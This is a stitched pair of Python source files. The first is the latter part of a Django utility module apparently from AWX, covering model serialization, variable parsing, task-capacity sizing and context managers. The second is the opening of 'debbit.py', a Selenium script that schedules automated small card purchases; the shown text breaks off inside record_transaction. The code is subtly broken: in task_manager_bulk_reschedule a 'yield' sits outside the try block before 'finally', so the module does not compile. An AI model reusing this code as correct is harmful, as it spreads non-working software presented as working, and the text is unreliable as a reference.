    new_password_fields = set(getattr(type(new), 'PASSWORD_FIELDS', [])) | set(['password'])
    diff = {}
    allowed_fields = get_allowed_fields(new, serializer_mapping)
    for field in allowed_fields:
        old_value = getattr(old, field, None)
        new_value = getattr(new, field, None)
        if old_value != new_value:
            diff[field] = (
                _convert_model_field_for_display(old, field, password_fields=old_password_fields),
                _convert_model_field_for_display(new, field, password_fields=new_password_fields),
            )
    if len(diff) == 0:
        diff = None
    return diff
def model_to_dict(obj, serializer_mapping=None):
    """
    Serialize a model instance to a dictionary as best as possible
    serializer_mapping are used to determine read-only fields.
    When provided, read-only fields will not be included in the resulting dictionary
    """
    password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
    return {
        name: _convert_model_field_for_display(obj, name, password_fields=password_fields)
        for name in get_allowed_fields(obj, serializer_mapping)
    }
class CharPromptDescriptor:
    """Class used for identifying nullable launch config fields from class
    ex. Schedule.limit
    """

    def __init__(self, field):
        # The NullablePromptPseudoField instance this descriptor marks.
        self.field = field
class NullablePromptPseudoField:
    """
    Interface for pseudo-property stored in `char_prompts` dict
    Used in LaunchTimeConfig and submodels, defined here to avoid circular imports
    """

    def __init__(self, field_name):
        # Key under which this pseudo-field lives in instance.char_prompts.
        self.field_name = field_name
    @cached_property
    def field_descriptor(self):
        """Marker object returned for class-level attribute access."""
        return CharPromptDescriptor(self)
    def __get__(self, instance, type=None):
        if instance is None:
            # for inspection on class itself
            return self.field_descriptor
        return instance.char_prompts.get(self.field_name, None)
    def __set__(self, instance, value):
        """Store the value in char_prompts; None/{} removes the entry."""
        if value in (None, {}):
            instance.char_prompts.pop(self.field_name, None)
        else:
            instance.char_prompts[self.field_name] = value
def copy_model_by_class(obj1, Class2, fields, kwargs):
    """
    Creates a new unsaved object of type Class2 using the fields from obj1
    values in kwargs can override obj1

    Field handling is dispatched on Class2's descriptor type: foreign keys
    are copied by id, char-prompt pseudo-fields go into char_prompts, and
    many-to-many fields are skipped (see copy_m2m_relationships).
    """
    create_kwargs = {}
    for field_name in fields:
        descriptor = getattr(Class2, field_name)
        if isinstance(descriptor, ForwardManyToOneDescriptor):  # ForeignKey
            # Foreign keys can be specified as field_name or field_name_id.
            id_field_name = '%s_id' % field_name
            if field_name in kwargs:
                value = kwargs[field_name]
            elif id_field_name in kwargs:
                value = kwargs[id_field_name]
            else:
                value = getattr(obj1, id_field_name)
            # Accept either a model instance or a raw pk.
            if hasattr(value, 'id'):
                value = value.id
            create_kwargs[id_field_name] = value
        elif isinstance(descriptor, CharPromptDescriptor):
            # difficult case of copying one launch config to another launch config
            new_val = None
            if field_name in kwargs:
                new_val = kwargs[field_name]
            elif hasattr(obj1, 'char_prompts'):
                if field_name in obj1.char_prompts:
                    new_val = obj1.char_prompts[field_name]
            elif hasattr(obj1, field_name):
                # extremely rare case where a template spawns a launch config - sliced jobs
                new_val = getattr(obj1, field_name)
            if new_val is not None:
                create_kwargs.setdefault('char_prompts', {})
                create_kwargs['char_prompts'][field_name] = new_val
        elif isinstance(descriptor, ManyToManyDescriptor):
            continue  # not copied in this method
        elif field_name in kwargs:
            if field_name == 'extra_vars' and isinstance(kwargs[field_name], dict):
                # extra_vars dicts are stored JSON-encoded.
                create_kwargs[field_name] = json.dumps(kwargs['extra_vars'])
            elif not isinstance(Class2._meta.get_field(field_name), (ForeignObjectRel, ManyToManyField)):
                create_kwargs[field_name] = kwargs[field_name]
        elif hasattr(obj1, field_name):
            create_kwargs[field_name] = getattr(obj1, field_name)
    # Apply class-specific extra processing for origination of unified jobs
    if hasattr(obj1, '_update_unified_job_kwargs') and obj1.__class__ != Class2:
        new_kwargs = obj1._update_unified_job_kwargs(create_kwargs, kwargs)
    else:
        new_kwargs = create_kwargs
    return Class2(**new_kwargs)
def copy_m2m_relationships(obj1, obj2, fields, kwargs=None):
    """
    In-place operation.
    Given two saved objects, copies related objects from obj1
    to obj2 to field of same name, if field occurs in `fields`

    Values in *kwargs* may override obj1's relations: a set/list/QuerySet is
    added directly, a related manager replaces the source relation.
    """
    for field_name in fields:
        if hasattr(obj1, field_name):
            try:
                field_obj = obj1._meta.get_field(field_name)
            except FieldDoesNotExist:
                continue
            if isinstance(field_obj, ManyToManyField):
                # Many to Many can be specified as field_name
                src_field_value = getattr(obj1, field_name)
                if kwargs and field_name in kwargs:
                    override_field_val = kwargs[field_name]
                    if isinstance(override_field_val, (set, list, QuerySet)):
                        getattr(obj2, field_name).add(*override_field_val)
                        continue
                    # Duck-typed check for a Django related manager override.
                    if override_field_val.__class__.__name__ == 'ManyRelatedManager':
                        src_field_value = override_field_val
                dest_field = getattr(obj2, field_name)
                dest_field.add(*list(src_field_value.all().values_list('id', flat=True)))
def get_type_for_model(model):
    """
    Return type name for a given model class.
    """
    concrete_opts = model._meta.concrete_model._meta
    return camelcase_to_underscore(concrete_opts.object_name)
def get_model_for_type(type_name):
    """
    Return model class for a given type name.
    """
    model_str = underscore_to_camelcase(type_name)
    # User lives in django.contrib.auth; everything else is in awx.main.
    app_label = 'auth' if model_str == 'User' else 'main'
    return apps.get_model(app_label, model_str)
def prefetch_page_capabilities(model, page, prefetch_list, user):
    """
    Given a `page` list of objects, a nested dictionary of user_capabilities
    are returned by id, ex.
    {
        4: {'edit': True, 'start': True},
        6: {'edit': False, 'start': False}
    }
    Each capability is produced for all items in the page in a single query
    Examples of prefetch language:
    prefetch_list = ['admin', 'execute']
      --> prefetch the admin (edit) and execute (start) permissions for
          items in list for current user
    prefetch_list = ['inventory.admin']
      --> prefetch the related inventory FK permissions for current user,
          and put it into the object's cache
    prefetch_list = [{'copy': ['inventory.admin', 'project.admin']}]
      --> prefetch logical combination of admin permission to inventory AND
          project, put into cache dictionary as "copy"
    """
    page_ids = [obj.id for obj in page]
    mapping = {}
    for obj in page:
        mapping[obj.id] = {}
    for prefetch_entry in prefetch_list:
        display_method = None
        # Dict entries name the capability explicitly; bare entries derive it.
        if type(prefetch_entry) is dict:
            display_method = list(prefetch_entry.keys())[0]
            paths = prefetch_entry[display_method]
        else:
            paths = prefetch_entry
        if type(paths) is not list:
            paths = [paths]
        # Build the query for accessible_objects according the user & role(s)
        filter_args = []
        for role_path in paths:
            if '.' in role_path:
                # Dotted path: permission is checked on a related model.
                res_path = '__'.join(role_path.split('.')[:-1])
                role_type = role_path.split('.')[-1]
                parent_model = model
                for subpath in role_path.split('.')[:-1]:
                    parent_model = parent_model._meta.get_field(subpath).related_model
                filter_args.append(
                    Q(Q(**{'%s__pk__in' % res_path: parent_model.accessible_pk_qs(user, '%s_role' % role_type)}) | Q(**{'%s__isnull' % res_path: True}))
                )
            else:
                role_type = role_path
                filter_args.append(Q(**{'pk__in': model.accessible_pk_qs(user, '%s_role' % role_type)}))
        if display_method is None:
            # Role name translation to UI names for methods
            display_method = role_type
            if role_type == 'admin':
                display_method = 'edit'
            elif role_type in ['execute', 'update']:
                display_method = 'start'
        # Union that query with the list of items on page
        filter_args.append(Q(pk__in=page_ids))
        ids_with_role = set(model.objects.filter(*filter_args).values_list('pk', flat=True))
        # Save data item-by-item
        for obj in page:
            mapping[obj.pk][display_method] = bool(obj.pk in ids_with_role)
    return mapping
def validate_vars_type(vars_obj):
    """Raise AssertionError unless *vars_obj* is a dictionary."""
    if isinstance(vars_obj, dict):
        return
    vars_type = type(vars_obj)
    if hasattr(vars_type, '__name__'):
        data_type = vars_type.__name__
    else:
        data_type = str(vars_type)
    raise AssertionError(_('Input type `{data_type}` is not a dictionary').format(data_type=data_type))
def parse_yaml_or_json(vars_str, silent_failure=True):
    """
    Attempt to parse a string of variables.
    First, with JSON parser, if that fails, then with PyYAML.
    If both attempts fail, return an empty dictionary if `silent_failure`
    is True, re-raise combination error if `silent_failure` if False.
    """
    # Already-parsed dicts pass straight through.
    if isinstance(vars_str, dict):
        return vars_str
    elif isinstance(vars_str, str) and vars_str == '""':
        return {}
    try:
        vars_dict = json.loads(vars_str)
        validate_vars_type(vars_dict)
    except (ValueError, TypeError, AssertionError) as json_err:
        try:
            vars_dict = yaml.safe_load(vars_str)
            # Can be None if '---'
            if vars_dict is None:
                vars_dict = {}
            validate_vars_type(vars_dict)
            if not silent_failure:
                # is valid YAML, check that it is compatible with JSON
                try:
                    json.dumps(vars_dict)
                except (ValueError, TypeError, AssertionError) as json_err2:
                    raise ParseError(_('Variables not compatible with JSON standard (error: {json_error})').format(json_error=str(json_err2)))
        except (yaml.YAMLError, TypeError, AttributeError, AssertionError) as yaml_err:
            if silent_failure:
                return {}
            # Report both parser failures together.
            raise ParseError(
                _('Cannot parse as JSON (error: {json_error}) or ' 'YAML (error: {yaml_error}).').format(json_error=str(json_err), yaml_error=str(yaml_err))
            )
    return vars_dict
def get_cpu_capacity():
    """Return (cpu_count, fork capacity) from env vars, settings, or psutil."""
    from django.conf import settings

    env_abscpu = os.getenv('SYSTEM_TASK_ABS_CPU', None)
    settings_abscpu = getattr(settings, 'SYSTEM_TASK_ABS_CPU', None)
    # Absolute overrides win outright and report a cpu count of 0.
    if env_abscpu is not None:
        return 0, int(env_abscpu)
    if settings_abscpu is not None:
        return 0, int(settings_abscpu)
    env_forkcpu = os.getenv('SYSTEM_TASK_FORKS_CPU', None)
    settings_forkcpu = getattr(settings, 'SYSTEM_TASK_FORKS_CPU', None)
    if env_forkcpu:
        forkcpu = int(env_forkcpu)
    elif settings_forkcpu:
        forkcpu = int(settings_forkcpu)
    else:
        forkcpu = 4
    cpu = psutil.cpu_count()
    return (cpu, cpu * forkcpu)
def get_mem_capacity():
    """Return (total_memory_bytes, memory-based fork capacity)."""
    from django.conf import settings

    env_absmem = os.getenv('SYSTEM_TASK_ABS_MEM', None)
    settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
    # Absolute overrides short-circuit and report 0 for total memory.
    if env_absmem is not None:
        return 0, int(env_absmem)
    if settings_absmem is not None:
        return 0, int(settings_absmem)
    env_forkmem = os.getenv('SYSTEM_TASK_FORKS_MEM', None)
    settings_forkmem = getattr(settings, 'SYSTEM_TASK_FORKS_MEM', None)
    if env_forkmem:
        forkmem = int(env_forkmem)
    elif settings_forkmem:
        forkmem = int(settings_forkmem)
    else:
        forkmem = 100
    mem = psutil.virtual_memory().total
    # Reserve 2GB, then divide remaining MB by per-fork memory; at least 1.
    return (mem, max(1, ((mem // 1024 // 1024) - 2048) // forkmem))
def get_system_task_capacity(scale=Decimal(1.0), cpu_capacity=None, mem_capacity=None):
    """
    Measure system memory and use it as a baseline for determining the system's capacity
    """
    from django.conf import settings

    env_forks = os.getenv('SYSTEM_TASK_FORKS_CAPACITY', None)
    settings_forks = getattr(settings, 'SYSTEM_TASK_FORKS_CAPACITY', None)
    if env_forks:
        return int(env_forks)
    if settings_forks:
        return int(settings_forks)
    cpu_cap = cpu_capacity if cpu_capacity is not None else get_cpu_capacity()[1]
    mem_cap = mem_capacity if mem_capacity is not None else get_mem_capacity()[1]
    # Start from the smaller bound, then add a scaled share of the headroom.
    lo, hi = sorted((mem_cap, cpu_cap))
    return lo + ((hi - lo) * scale)
# Thread-local flags read by the context managers below: one for suppressing
# inventory updates, one for batching task-manager scheduling.
_inventory_updates = threading.local()
_task_manager = threading.local()
@contextlib.contextmanager
def ignore_inventory_computed_fields():
    """
    Context manager to ignore updating inventory computed fields.
    """
    saved = getattr(_inventory_updates, 'is_updating', False)
    _inventory_updates.is_updating = True
    try:
        yield
    finally:
        # Restore the previous flag even if the body raised.
        _inventory_updates.is_updating = saved
def _schedule_task_manager():
    """Dispatch the task manager once the current transaction commits."""
    from awx.main.scheduler.tasks import run_task_manager
    from django.db import connection

    # runs right away if not in transaction
    connection.on_commit(lambda: run_task_manager.delay())
@contextlib.contextmanager
def task_manager_bulk_reschedule():
    """Context manager to avoid submitting task multiple times."""
    try:
        # Save both flags so nested usage restores correctly.
        previous_flag = getattr(_task_manager, 'bulk_reschedule', False)
        previous_value = getattr(_task_manager, 'needs_scheduling', False)
        _task_manager.bulk_reschedule = True
        _task_manager.needs_scheduling = False
    yield
    finally:
        # Order matters: drop the bulk flag, fire at most one deferred
        # schedule, then restore the saved needs_scheduling state.
        _task_manager.bulk_reschedule = previous_flag
        if _task_manager.needs_scheduling:
            _schedule_task_manager()
        _task_manager.needs_scheduling = previous_value
def schedule_task_manager():
    """Run the task manager now, or defer it inside a bulk-reschedule block."""
    if getattr(_task_manager, 'bulk_reschedule', False):
        # Deferred: task_manager_bulk_reschedule() submits once on exit.
        _task_manager.needs_scheduling = True
    else:
        _schedule_task_manager()
@contextlib.contextmanager
def ignore_inventory_group_removal():
    """
    Context manager to ignore moving groups/hosts when group is deleted.
    """
    saved = getattr(_inventory_updates, 'is_removing', False)
    _inventory_updates.is_removing = True
    try:
        yield
    finally:
        # Restore the previous flag even if the body raised.
        _inventory_updates.is_removing = saved
@contextlib.contextmanager
def set_environ(**environ):
    """
    Temporarily set the process environment variables.
    >>> with set_environ(FOO='BAR'):
    ...     assert os.environ['FOO'] == 'BAR'
    """
    saved_environ = dict(os.environ)
    try:
        os.environ.update(environ)
        yield
    finally:
        # Reset to exactly the pre-context environment.
        os.environ.clear()
        os.environ.update(saved_environ)
def get_pk_from_dict(_dict, key):
    """
    Helper for obtaining a pk from user data dict or None if not present.

    Returns the ``id`` attribute when the value looks like a model object,
    otherwise attempts integer coercion; returns None on any failure.
    """
    try:
        val = _dict[key]
        # The original also tested isinstance(val, object), which is always
        # True; only the attribute check is meaningful.
        if hasattr(val, 'id'):
            return val.id  # return id if given model object
        return int(val)
    except (TypeError, KeyError, ValueError):
        return None
class NoDefaultProvided(object):
    """Sentinel type distinguishing "no default passed" from default=None."""

    pass


def getattrd(obj, name, default=NoDefaultProvided):
    """
    Same as getattr(), but allows dot notation lookup
    Discussed in:
    http://stackoverflow.com/questions/11975781

    Raises AttributeError when the lookup fails and no default was provided.
    """
    try:
        return reduce(getattr, name.split("."), obj)
    except AttributeError:
        # Sentinel comparison should use identity, not equality.
        if default is not NoDefaultProvided:
            return default
        raise
def getattr_dne(obj, name, notfound=ObjectDoesNotExist):
    """Like getattr(), but returns None when the *notfound* exception is raised."""
    try:
        value = getattr(obj, name)
    except notfound:
        return None
    return value
# Module-level handle on the Django app registry; defaults to the live
# ``apps`` object and can be swapped out via set_current_apps().
current_apps = apps
def set_current_apps(apps):
    # Replace the registry returned by get_current_apps() (the parameter
    # shadows the module-level import on purpose).
    global current_apps
    current_apps = apps
def get_current_apps():
    # Return whichever app registry was last installed.
    global current_apps
    return current_apps
def get_custom_venv_choices(custom_paths=None):
    """List virtualenv directories (with trailing slash) under the venv roots."""
    from django.conf import settings

    search_roots = [settings.BASE_VENV_PATH] + (custom_paths or settings.CUSTOM_VENV_PATHS)
    choices = []
    for root in search_roots:
        try:
            if not os.path.exists(root):
                continue
            for entry in os.listdir(root):
                candidate = os.path.join(root, entry)
                # A valid venv has bin/activate; 'awx' itself is excluded.
                if (
                    entry != 'awx'
                    and os.path.isdir(candidate)
                    and os.path.exists(os.path.join(candidate, 'bin', 'activate'))
                ):
                    choices.append(os.path.join(root, entry, ''))
        except Exception:
            logger.exception("Encountered an error while discovering custom virtual environments.")
    return choices
def is_ansible_variable(key):
    """True when *key* uses the reserved ``ansible_`` prefix."""
    return key.startswith('ansible_')
def extract_ansible_vars(extra_vars):
    """Split extra_vars into (non-ansible vars dict, set of ansible var names)."""
    parsed = parse_yaml_or_json(extra_vars)
    ansible_vars = set([])
    # Iterate over a snapshot of keys since entries are removed in-place.
    for key in list(parsed.keys()):
        if is_ansible_variable(key):
            del parsed[key]
            ansible_vars.add(key)
    return (parsed, ansible_vars)
def get_search_fields(model):
    """Return the subset of *model*'s field names that are text-searchable."""
    searchable = ('username', 'first_name', 'last_name', 'email', 'name', 'description')
    return [field.name for field in model._meta.fields if field.name in searchable]
def has_model_field_prefetched(model_obj, field_name):
    # NOTE: Update this function if django internal implementation changes.
    # Checks whether the related manager for `field_name` is present in
    # Django's private `_prefetched_objects_cache` by matching its
    # prefetch_cache_name. Missing attributes fall back to '' / {}, and
    # '' is never a cache key, so the result is False in that case.
    return getattr(getattr(model_obj, field_name, None), 'prefetch_cache_name', '') in getattr(model_obj, '_prefetched_objects_cache', {})
def get_external_account(user):
    """Classify the external auth source backing *user*'s account.

    Returns 'ldap', 'social', or 'enterprise' — later checks overwrite
    earlier ones, so enterprise wins over social wins over ldap — or None
    for a purely local account.
    """
    from django.conf import settings
    account_type = None
    if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):
        try:
            # LDAP-backed users carry an ldap_dn and have no usable local password.
            if user.pk and user.profile.ldap_dn and not user.has_usable_password():
                account_type = "ldap"
        except AttributeError:
            # e.g. user has no profile — treat as not LDAP-backed.
            pass
    # Social login applies when any social backend is configured AND the user
    # has at least one social_auth record.
    if (
        getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None)
        or getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None)
        or getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None)
        or getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None)
        or getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)
    ) and user.social_auth.all():
        account_type = "social"
    if (getattr(settings, 'RADIUS_SERVER', None) or getattr(settings, 'TACACSPLUS_HOST', None)) and user.enterprise_auth.all():
        account_type = "enterprise"
    return account_type
class classproperty:
    """Descriptor like @property but evaluated against the owning class.

    Only the getter is ever invoked; fset/fdel are stored for parity with
    property() but not wired into __set__/__delete__.
    """
    def __init__(self, fget=None, fset=None, fdel=None, doc=None):
        self.fget = fget
        self.fset = fset
        self.fdel = fdel
        # Inherit the getter's docstring unless one was supplied explicitly.
        self.__doc__ = fget.__doc__ if (doc is None and fget is not None) else doc
    def __get__(self, instance, ownerclass):
        # Always delegate to the getter with the owning class; the instance
        # (which may be None on class access) is deliberately ignored.
        return self.fget(ownerclass)
def create_temporary_fifo(data):
    """Open fifo named pipe in a new thread using a temporary file path. The
    thread blocks until data is read from the pipe.
    Returns the path to the fifo.
    :param data(bytes): Data to write to the pipe.
    """
    # mkdtemp() yields a private directory, so a fixed name inside it is
    # collision-free. This replaces tempfile._get_candidate_names(), a private
    # API that may change between Python versions.
    path = os.path.join(tempfile.mkdtemp(), 'fifo')
    os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)

    def _writer(fifo_path, payload):
        # open() on a fifo blocks until a reader attaches; `with` guarantees
        # the writer end is flushed and closed afterwards (the original
        # lambda leaked the file object without closing it).
        with open(fifo_path, 'wb') as f:
            f.write(payload)

    threading.Thread(target=_writer, args=(path, data)).start()
    return path
def truncate_stdout(stdout, size):
    """Truncate *stdout* to at most *size* characters, appending an ellipsis
    and re-closing any ANSI SGR color sequences left open by the cut."""
    from awx.main.constants import ANSI_SGR_PATTERN
    if size <= 0 or len(stdout) <= size:
        return stdout
    truncated = stdout[: (size - 1)] + u'\u2026'
    # Count SGR "set" codes vs reset codes in the kept portion; any surplus
    # of set codes must be balanced by trailing resets.
    codes = [m.group() for m in ANSI_SGR_PATTERN.finditer(truncated)]
    resets = codes.count(u'\u001b[0m')
    unbalanced = (len(codes) - resets) - resets
    return truncated + u'\u001b[0m' * unbalanced
def deepmerge(a, b):
    """
    Merge dict structures and return the result.
    >>> a = {'first': {'all_rows': {'pass': 'dog', 'number': '1'}}}
    >>> b = {'first': {'all_rows': {'fail': 'cat', 'number': '5'}}}
    >>> import pprint; pprint.pprint(deepmerge(a, b))
    {'first': {'all_rows': {'fail': 'cat', 'number': '5', 'pass': 'dog'}}}
    """
    if isinstance(a, dict) and isinstance(b, dict):
        # Recurse key-wise over the union of both key sets.
        return {key: deepmerge(a.get(key), b.get(key)) for key in set(a) | set(b)}
    if b is None:
        return a
    return b
|
debbit.py | #!/usr/bin/env python3
import base64
import logging
import os
import platform
import random
import smtplib
import ssl
import sys
import time
import traceback
import urllib.request
import zipfile
from datetime import datetime
from datetime import timedelta
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from io import BytesIO
from threading import Timer, Lock, Thread
import coverage
import yaml # PyYAML
from selenium import webdriver
from selenium.common.exceptions import SessionNotCreatedException
from selenium.webdriver.firefox.options import Options
from result import Result
def main():
    """Entry point: report this month's progress, then launch every
    configured merchant in the mode selected in config."""
    update_check()
    now = datetime.now()
    state = load_state(now.year, now.month)
    month_label = now.strftime('%B %Y')
    if not state:
        LOGGER.info('No purchases yet complete for ' + month_label)
    for merchant_id in state:
        count = state[merchant_id]['purchase_count']
        LOGGER.info(str(count) + ' ' + merchant_id + ' ' + plural('purchase', count) + ' complete for ' + month_label)
    LOGGER.info('')
    for card, merchants in CONFIG.cards.items():
        for merchant_name, merchant_conf in merchants.items():
            load_merchant(card, merchant_name, merchant_conf)
def load_state(year, month):
    """Return the persisted purchase-state dict for *year*/*month*.

    Returns {} when the state file does not exist yet, and also when the
    file exists but is empty: yaml.safe_load returns None for empty input,
    which would crash callers that do `merchant_id in state` or
    `state.get(...)`.
    """
    padded_month = '0' + str(month) if month < 10 else str(month)
    filename = absolute_path('state', 'debbit_' + str(year) + '_' + padded_month + '.txt')
    try:
        with open(filename, 'r', encoding='utf-8') as f:
            # `or {}` guards against an empty/whitespace-only state file.
            return yaml.safe_load(f.read()) or {}
    except FileNotFoundError:
        return {}
def load_merchant(card, merchant_name, merchant_conf):
    """Import the merchant's automation module and schedule it per CONFIG.mode."""
    try:
        module = __import__('program_files.merchants.' + merchant_name, fromlist=["*"])
        web_automation = module.web_automation
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception as e:
        LOGGER.error('Error loading ' + merchant_name + '.py from merchants folder')
        raise e
    merchant = Merchant(card, merchant_name, web_automation, merchant_conf)
    # spread mode runs on Timers; burst mode gets a dedicated polling thread.
    if CONFIG.mode == 'spread':
        start_spread_schedule(merchant)
    if CONFIG.mode == 'burst':
        Thread(target=burst_loop, args=(merchant,)).start()
def burst_loop(merchant):
    """Run forever: fire bursts of up to merchant.burst_count purchases when
    the schedule allows, otherwise log the next burst time or sleep/poll."""
    # These 3 variables are modified during each loop
    suppress_logs = False
    burst_gap = None
    skip_time = datetime.fromtimestamp(0)
    while True:
        now = datetime.now()
        state = load_state(now.year, now.month)
        this_burst_count = merchant.burst_count
        prev_burst_time = 0
        cur_purchase_count = state.get(merchant.id, {}).get('purchase_count') or 0
        if not burst_gap:  # only applies to first loop
            burst_gap = get_burst_min_gap(merchant, cur_purchase_count, now)
        if merchant.id in state:
            # Timestamp of the transaction that started the previous full burst.
            if len(state[merchant.id]['transactions']) >= merchant.burst_count:
                prev_burst_time = state[merchant.id]['transactions'][merchant.burst_count * -1]['unix_time']
            # Inspect the most recent (up to burst_count) transactions for a
            # partially completed burst from a prior run of the program.
            for transaction in state[merchant.id]['transactions'][-min(len(state[merchant.id]['transactions']), merchant.burst_count):]:
                if transaction['unix_time'] > int(now.timestamp()) - min(get_burst_min_gap(merchant, cur_purchase_count, now), 3600):
                    this_burst_count -= 1  # Program was stopped during burst within 60 minutes ago, count how many occurred within the last partial burst
            # Never burst past the configured monthly total.
            this_burst_count = min(this_burst_count, merchant.total_purchases - cur_purchase_count)
        # Burst only when the gap has elapsed, we're inside the day-of-month
        # window, purchases remain, and the merchant hasn't asked to skip.
        if prev_burst_time < int(now.timestamp()) - burst_gap \
                and now.day >= merchant.min_day \
                and now.day <= (merchant.max_day if merchant.max_day else DAYS_IN_MONTH[now.month] - 1) \
                and cur_purchase_count < merchant.total_purchases \
                and now > skip_time:
            LOGGER.info('Now bursting ' + str(this_burst_count) + ' ' + merchant.id + ' ' + plural('purchase', this_burst_count))
            result = web_automation_wrapper(merchant)  # First execution outside of loop so we don't sleep before first execution and don't sleep after last execution
            cur_purchase_count += 1
            for i in range(this_burst_count - 1):
                # Abort the rest of the burst on any non-success result.
                if result != Result.success:
                    break
                sleep_time = merchant.burst_intra_gap
                LOGGER.info('Waiting ' + str(sleep_time) + ' ' + plural('second', sleep_time) + ' before next ' + merchant.id + ' purchase')
                time.sleep(sleep_time)
                result = web_automation_wrapper(merchant)
                cur_purchase_count += 1
            # Re-randomize the gap so purchase timing doesn't form a pattern.
            burst_gap = get_burst_min_gap(merchant, cur_purchase_count, now) + random.randint(0, int(merchant.burst_time_variance))
            if result == Result.skipped:
                # Merchant automation asked to skip; retry one day later.
                skip_time = now + timedelta(days=1)
            suppress_logs = False
        elif not suppress_logs:
            # Log the projected next burst once, then stay quiet until state changes.
            log_next_burst_time(merchant, now, prev_burst_time, burst_gap, skip_time, cur_purchase_count)
            suppress_logs = True
        else:
            time.sleep(merchant.burst_poll_gap)
def get_burst_min_gap(merchant, cur_purchase_count, now):
    """Return the minimum number of seconds to wait between bursts.

    A config-supplied burst min_gap wins; otherwise the gap is derived from
    the time left in the month and the purchases still to make, capped at a
    22-hour default.
    """
    if merchant.burst_min_gap is not None:  # explicit value from config file
        return merchant.burst_min_gap
    default_gap = 79200  # 22 hours
    remaining = merchant.total_purchases - cur_purchase_count
    if remaining < 1:
        return default_gap
    end_day = merchant.max_day or DAYS_IN_MONTH[now.month] - 1
    secs_left = max(0, (datetime(now.year, now.month, end_day) - now).total_seconds())
    # Aim to fit ~4x the remaining bursts into the rest of the window.
    dynamic_gap = int(secs_left / 4 / remaining * merchant.burst_count)
    return min(dynamic_gap, default_gap)
def log_next_burst_time(merchant, now, prev_burst_time, burst_gap, skip_time, cur_purchase_count):
    """Log when the next burst is expected and how many purchases it will
    contain; purely informational, mutates no scheduling state."""
    prev_burst_plus_gap_dt = datetime.fromtimestamp(prev_burst_time + burst_gap)
    cur_month_min_day_dt = datetime(now.year, now.month, merchant.min_day)
    # Roll over to January of next year when computing next month's window.
    if now.month == 12:
        year = now.year + 1
        month = 1
    else:
        year = now.year
        month = now.month + 1
    next_month_min_day_dt = datetime(year, month, merchant.min_day)
    if now.day < merchant.min_day:
        # Before this month's window opens: wait for the gap or the window
        # start, whichever is later.
        next_burst_time = prev_burst_plus_gap_dt if prev_burst_plus_gap_dt > cur_month_min_day_dt else cur_month_min_day_dt
        next_burst_count = merchant.burst_count
    elif cur_purchase_count >= merchant.total_purchases or now.day > (merchant.max_day if merchant.max_day else DAYS_IN_MONTH[now.month] - 1):
        # Month complete or window closed: next burst lands next month.
        next_burst_time = prev_burst_plus_gap_dt if prev_burst_plus_gap_dt > next_month_min_day_dt else next_month_min_day_dt
        next_burst_count = merchant.burst_count
    else:
        next_burst_time = prev_burst_plus_gap_dt
        next_burst_count = min(merchant.burst_count, merchant.total_purchases - cur_purchase_count)
    if next_burst_time < skip_time:
        next_burst_time = skip_time
    LOGGER.info('Bursting next ' + str(next_burst_count) + ' ' + merchant.id + ' ' + plural('purchase', next_burst_count) + ' after ' + next_burst_time.strftime("%Y-%m-%d %I:%M%p"))
def start_spread_schedule(merchant):
    """Kick off spread-mode scheduling for *merchant* based on saved state."""
    now = datetime.now()
    state = load_state(now.year, now.month)
    if merchant.id not in state:  # first run of the month
        if now.day >= merchant.min_day:
            spread_recursion(merchant)
        else:
            # Window not open yet: defer the first purchase to min_day.
            start_offset = (datetime(now.year, now.month, merchant.min_day) - now).total_seconds()
            LOGGER.info('Scheduling ' + merchant.id + ' at ' + formatted_date_of_offset(now, start_offset))
            Timer(start_offset, spread_recursion, [merchant]).start()
    elif state[merchant.id]['purchase_count'] < merchant.total_purchases and now.timestamp() - state[merchant.id]['transactions'][-1]['unix_time'] > merchant.spread_min_gap:
        # Purchases remain and the last one is old enough: buy immediately.
        spread_recursion(merchant)
    else:
        schedule_next_spread(merchant)
def schedule_next_spread(merchant):
    """Compute a randomized delay for the next spread-mode purchase and arm
    a Timer that will fire spread_recursion."""
    now = datetime.now()
    state = load_state(now.year, now.month)
    cur_purchase_count = state[merchant.id]['purchase_count'] if merchant.id in state else 0
    if cur_purchase_count < merchant.total_purchases:
        # Spread the remaining purchases evenly over the rest of the window,
        # jittered by +/- time_variance around the average gap.
        remaining_purchase_count = merchant.total_purchases - cur_purchase_count
        month_end_day = merchant.max_day if merchant.max_day else DAYS_IN_MONTH[now.month] - 1
        remaining_secs_in_month = (datetime(now.year, now.month, month_end_day) - now).total_seconds()
        average_gap = remaining_secs_in_month / remaining_purchase_count
        time_variance = merchant.spread_time_variance
        # Shrink the jitter window when the average gap is too small to hold it.
        while average_gap < time_variance * 2 and time_variance > 60:
            time_variance = time_variance / 2
        # Clamp both ends of the jitter window to the configured minimum gap.
        range_min = average_gap - time_variance if average_gap - time_variance > merchant.spread_min_gap else merchant.spread_min_gap
        range_max = average_gap + time_variance if average_gap + time_variance > merchant.spread_min_gap else merchant.spread_min_gap
    else:  # purchases complete for current month, schedule to start purchasing on the 2nd day of next month
        if now.month == 12:
            year = now.year + 1
            month = 1
        else:
            year = now.year
            month = now.month + 1
        range_min = (datetime(year, month, merchant.min_day) - now).total_seconds()
        if range_min <= 0:
            LOGGER.error('Fatal error, could not determine date of next month when scheduling ' + merchant.id)
            return
        range_max = range_min + merchant.spread_time_variance
    start_offset = random.randint(int(range_min), int(range_max))
    LOGGER.info('Scheduling next ' + merchant.id + ' at ' + formatted_date_of_offset(now, start_offset))
    LOGGER.info('')
    Timer(start_offset, spread_recursion, [merchant]).start()
def spread_recursion(merchant):
    # Execute one purchase, then arm the next Timer; each Timer fires this
    # function again, forming the spread-mode scheduling loop.
    web_automation_wrapper(merchant)
    schedule_next_spread(merchant)
def record_transaction(merchant_id, amount):
    """Persist one successful purchase of *amount* cents to this month's
    state file.

    The read-modify-write of the state file happens under STATE_WRITE_LOCK
    so concurrent merchant threads cannot clobber each other's updates.
    """
    now = datetime.now()
    LOGGER.info('Recording successful ' + merchant_id + ' purchase')
